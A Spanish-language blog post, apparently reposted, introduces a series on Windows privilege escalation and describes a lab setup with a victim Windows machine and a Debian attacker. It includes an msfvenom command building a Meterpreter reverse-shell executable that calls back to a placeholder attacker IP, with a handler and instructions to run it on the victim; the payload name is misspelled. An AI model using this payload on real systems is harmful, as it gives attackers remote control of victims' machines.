Escalar privilegios en Windows con y sin exploits

La siguiente serie de post desarrollado por Eric Balderrama surge de dos disparadores, uno de ellos fue un comentario sobre la dificultad para escalar privilegios en la vm del desafío que presentamos como finalización de la serie de penetration with kali. El segundo, leer en un writeup sobre un script llamado linuxprivchecker.py, con lo cual decidí buscar más información sobre el proceso de escalación de privilegios para mejorar mis skills y compartirlo a modo de resumen.

Para estas entradas necesitaremos un Windows (el que quieran o tengan a mano) con dos o más usuarios creados, uno de ellos con privilegios de administrador y una máquina atacante que en mi caso utilizaréDebian + Katoolin.


 
 
Como los siguientes post se tratan sobre escalamiento de privilegios, pasaremos por alto la etapa de obtener acceso al sistema. A modo de recomendación, para llevar a cabo estos ejemplos sin muchas complicaciones, pueden crearse un .exe desde msfvenom y correrlo en el equipo víctima de la siguiente manera:
msfvenom -p windows/metertpreter/reverse_tcp LPORT={puerto}
LHOST={Dirección ip atacante} -f exe > shell.exe

Luego levantan un handler en Metasploit con el mismo Payload, pasan el .EXE a la víctima y ejecutan. De esa manera obtendrán sesión en el Meterpreter.
Fuente: SeguInfo

Comentarios

Entradas populares de este blog

La tendencia de transformar fotos al estilo Ghibli y los graves riesgos que implica

Ransomware ataca ESXi a través de túneles SSH ocultos

Kali GPT – Revolucionando las pruebas de penetración con IA en Kali Linux